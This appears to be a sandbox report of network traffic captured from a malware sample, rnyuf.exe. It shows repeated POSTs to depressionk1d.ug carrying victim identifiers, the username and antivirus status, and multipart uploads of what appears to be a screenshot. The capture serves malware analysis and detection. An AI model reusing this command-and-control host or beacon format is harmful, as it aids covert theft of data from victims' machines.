                          Nov 12, 2021 22:23:19.581780910 CET2560OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:19.581830978 CET2563OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:19.581845045 CET2566OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:19.581852913 CET2568OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:19.581862926 CET2574OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:19.581887960 CET2575OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:19.581924915 CET2578OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:19.653569937 CET2651INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:19 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          200192.168.2.449988178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.481609106 CET9037OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.506922007 CET9037INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          201192.168.2.449990178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.636147022 CET9046OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.662151098 CET9055INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          202192.168.2.449991178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.793643951 CET9110OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.819433928 CET9120INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          203192.168.2.449992178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:59.949820042 CET9121OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:59.975209951 CET9122INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:59 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          204192.168.2.449994178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:00.106127024 CET9128OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.132323027 CET9129INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          205192.168.2.449997178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:00.269897938 CET9173OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.298943043 CET9174INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:00.300745010 CET9175OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----35cdb41c8aae8e685df6a1946f054310
                          Host: depressionk1d.ug
                          Content-Length: 111710
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:00.300941944 CET9175OUTData Raw: 2d 2d 2d 2d 2d 2d 33 35 63 64 62 34 31 63 38 61 61 65 38 65 36 38 35 64 66 36 61 31 39 34 36 66 30 35 34 33 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------35cdb41c8aae8e685df6a1946f054310Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:00.301208973 CET9185OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:00.301364899 CET9188OUTData Raw: de fb bf f3 b8 b4 51 45 6c 64 14 51 4b 40 09 45 29 a4 a0 04 34 0a 5a 28 18 52 d2 52 d0 20 a4 a5 a3 19 a6 02 51 4b 8a 31 4a c0 25 14 b8 a4 a0 02 8a 28 a0 7a 85 14 51 40 82 8a 28 a0 02 8a 28 a0 02 8a 29 79 a0 03 9a 28 e6 8a 60 14 51 45 02 0a 28 14
                          Data Ascii: QEldQK@E)4Z(RR QK1J%(zQ@(()y(`QE(+g%DA5YJ>]j'#(i;;0nP{r8-T?>?ESb(b(OSNSN
                          Nov 12, 2021 22:24:00.327275038 CET9246OUTData Raw: 75 02 10 d2 52 e2 8a 60 25 14 b4 77 a4 02 51 4b 41 a6 00 68 a3 bd 14 00 da 9a d3 fe 3f 6d ff 00 eb aa ff 00 31 50 d4 b6 df f1 f7 07 fd 74 5f e7 59 55 f8 1f a1 d1 86 fe 3c 3d 57 e6 75 fb e8 df 55 f7 d1 be be 4f 94 fd 83 da 9d 49 d0 60 3e 1b 92 f5
                          Data Ascii: uR`%wQKAh?m1Pt_YU<=WuUOI`>oElnIYFg#qnu@[S4jsXN=%>~g{IL^5cX1ve,k?:(>p:IEjYNe|::n}ko
                          Nov 12, 2021 22:24:00.327336073 CET9252OUTData Raw: 61 47 ee cf 6a b1 fd 8d a8 ff 00 cf bf fe 3e bf e3 4b fd 8d a8 7f cf bf fe 3e bf e3 59 fd 7b 0f fc eb ef 47 4f f6 46 3f fe 7c cf ff 00 01 7f e4 56 f2 e3 34 86 05 3d 0d 49 71 65 75 68 a1 a6 88 aa 93 80 72 08 fd 2a 00 c6 b7 85 4a 73 5c d1 77 5e 47
                          Data Ascii: aGj>K>Y{GOF?|V4=Iqeuhr*Js\w^G%Zq}G}z}CZpD#6;S,;U1yG$XscM}*)r.c?D'^scR}~A"TIjiv4b1MGjVv(@
                          Nov 12, 2021 22:24:00.350198030 CET9258OUTData Raw: 3d c4 cd 2b 9c 9c f2 cc 49 35 e2 9f 1c 58 36 b1 68 01 c9 58 50 1f 6e 64 3f d6 b8 bf f8 58 9e 27 ff 00 a0 a5 d7 fe 04 49 ff 00 c5 56 3e a5 ab de 6a f2 89 6e e5 2e dd c9 24 92 7d 49 24 93 57 4f 0d 59 d4 8b 92 b2 4e fb 84 b1 18 5a 54 aa 72 4d c9 c9
                          Data Ascii: =+I5X6hXPnd?X'IV>jn.$}I$WOYNZTrMY+[RQdx"RPoi}My19x%}b?9+,md-Yb|#u<sAJ=-3Q3$~7Ft2dc#xGk?N
                          Nov 12, 2021 22:24:00.350259066 CET9273OUTData Raw: 2e 68 26 c4 a0 d3 83 54 20 d3 81 a6 2e 52 70 f4 e0 d5 5b 75 48 87 9a 64 38 96 54 d4 9b b3 55 c3 53 83 53 32 71 2c 06 a5 0d 50 ee e2 94 35 2b 10 e2 4f bb 8a 72 ca 47 43 55 cb 52 07 a5 ca 85 c8 5e 5b 97 1f c4 69 7e d2 dd f9 aa 61 e8 df 53 ec d0 b9
                          Data Ascii: .h&T .Rp[uHd8TUSS2q,P5+OrGCUR^[i~aSYwS?oSf\lcTCcNI#OTVfC)*fkR$OB~n-q|GGU!t:!+M=&R{'CGZ7L?zS&J_
                          Nov 12, 2021 22:24:00.350305080 CET9281OUTData Raw: fa 57 63 f6 38 bf b8 9f f7 cd 27 d8 a2 fe e2 7f df 34 7b 0f 31 7d 7e 1d 8e 3f f0 a5 fc 2b b0 fb 14 5f dc 5f fb e6 8f b1 43 ff 00 3c d7 fe f9 a3 d8 f9 87 d7 e1 d8 e3 c5 2f 7e 95 d7 fd 8a 1f f9 e6 bf f7 cd 2f d8 a1 fe e2 ff 00 df 34 fd 8b ee 1f 5f
                          Data Ascii: Wc8'4{1}~?+__C</~/4_c#J>_gOb{~&+p$jE%8l#"'FIl=bgti)IdH`G=yMmiq[Iq^ml`t)vR@
                          Nov 12, 2021 22:24:00.350356102 CET9305OUTData Raw: 2d 9a 28 8d 03 8a 78 14 ed b4 e0 95 0d 9a 28 88 17 8a 78 1e 94 a1 69 e1 6a 1b 34 51 62 01 9a 70 14 a1 69 e1 33 52 d9 a2 88 d0 29 e0 73 4e 09 8a 78 4c f6 a8 72 34 51 63 40 e6 a4 55 cd 28 8f da a5 58 8d 66 e4 8d 63 06 46 16 9e 05 4e b6 ee 7f 84 d4
                          Data Ascii: -(x(xij4Qbpi3R)sNxLr4Qc@U(XfcFNS&u5TSH,@X*,W?Jf5hwL=k#u6rRzQJzRf={`Y?+2:'|l|W5
                          Nov 12, 2021 22:24:00.372848988 CET9310OUTData Raw: 94 7f c2 fc bd ff 00 9f 0b 7f fb f2 df fc 72 bc be d7 c3 5a 85 ec 76 ed 6f e4 c8 6e 2f 65 b2 45 df 82 1e 35 56 66 24 80 02 80 d9 c9 3d 8e 71 52 5c 78 79 61 8a 3b 98 f5 ad 36 e6 c4 cf f6 79 6f 21 f3 8a 40 e4 12 03 83 18 7c 10 0e 0a a9 07 07 d2 92
                          Data Ascii: rZvon/eE5Vf$=qR\xya;6yo!@|gv"{iRY5FAG:d<w)!"ZZ\:e]q$B/=K$(xJ^LkM,vpiIvN7B#5(SN"!F-$4V5eU6#
                          Nov 12, 2021 22:24:00.398751020 CET9325INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:24:00.411881924 CET9325OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.438479900 CET9331INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          206192.168.2.449998178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:00.575884104 CET9333OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.601737022 CET9333INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          207192.168.2.450000178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:00.737734079 CET9339OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.763137102 CET9348INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          208192.168.2.450001178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:00.937268972 CET9373OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:00.964185953 CET9374INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:00 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          209192.168.2.450003178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:01.105938911 CET9375OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:01.131673098 CET9376INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:01 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          21192.168.2.449803178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:20.104474068 CET2652OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:20.104620934 CET2652OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:20.104842901 CET2662OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:20.105032921 CET2665OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
